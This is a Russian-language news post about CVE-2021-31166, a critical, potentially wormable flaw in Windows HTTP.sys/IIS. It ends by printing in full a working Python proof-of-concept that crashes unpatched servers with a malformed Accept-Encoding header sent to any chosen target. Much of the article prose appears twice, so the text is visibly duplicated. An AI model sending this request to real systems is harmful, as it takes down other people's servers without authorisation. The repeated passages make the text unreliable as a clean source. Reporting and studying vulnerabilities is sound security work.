В рамках майского «вторника обновлений» компания Microsoft устранила опасный баг в Internet Information Services (IIS), который получил идентификатор CVE-2021-31166. Еще на прошлой неделе многие исследователи и ИБ-компании писали, что данная уязвимость – одна из наиболее серьезных проблем, исправленных в этом месяце (9,8 из 10 баллов по шкале CVSS v3).
Уязвимость связана с повреждением информации в памяти стека протокола HTTP, включенного в во все «свежие» версии Windows. Этот стек используется сервером Windows IIS. Если данный сервер активен, злоумышленник может отправить ему специально подготовленный пакет и выполнить вредоносный код на уровне ядра ОС. Хуже того, Microsoft предупреждала, что уязвимость обладает потенциалом червя, то есть может применяться для создания малвари, самостоятельно распространяющейся с сервера на сервер.
В минувшие выходные бывший инженер Microsoft и ныне ИБ-исследователь Аксель Суше опубликовал PoC-эксплоит для CVE-2021-31166. Возможности эксплоита искусственно ограничены: он не позволяет создать полноценного червя, лишь приводит к «падению» (DoS) непропатченных версий Windows с работающим сервером IIS.
К счастью, эта уязвимость затрагивает только наиболее новые версии ОС: Windows 10 2004 и 20H2, а также Windows Server 2004 и 20H2, которые пока распространены не слишком широко. Тем не менее, Microsoft напоминает, что не стоит откладывать установку обновлений в долгий ящик.
PoC
Уязвимость связана с повреждением информации в памяти стека протокола HTTP, включенного в во все «свежие» версии Windows. Этот стек используется сервером Windows IIS. Если данный сервер активен, злоумышленник может отправить ему специально подготовленный пакет и выполнить вредоносный код на уровне ядра ОС. Хуже того, Microsoft предупреждала, что уязвимость обладает потенциалом червя, то есть может применяться для создания малвари, самостоятельно распространяющейся с сервера на сервер.
В минувшие выходные бывший инженер Microsoft и ныне ИБ-исследователь Аксель Суше опубликовал PoC-эксплоит для CVE-2021-31166. Возможности эксплоита искусственно ограничены: он не позволяет создать полноценного червя, лишь приводит к «падению» (DoS) непропатченных версий Windows с работающим сервером IIS.
К счастью, эта уязвимость затрагивает только наиболее новые версии ОС: Windows 10 2004 и 20H2, а также Windows Server 2004 и 20H2, которые пока распространены не слишком широко. Тем не менее, Microsoft напоминает, что не стоит откладывать установку обновлений в долгий ящик.
PoC
Python:
# https://github.com/0vercl0k/CVE-2021-31166
# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse
def main():
parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
parser.add_argument('--target', required = True)
args = parser.parse_args()
r = requests.get(f'http://{args.target}/', headers = {
'Accept-Encoding': 'doar-e, ftw, imo, ,',
})
print(r)
main()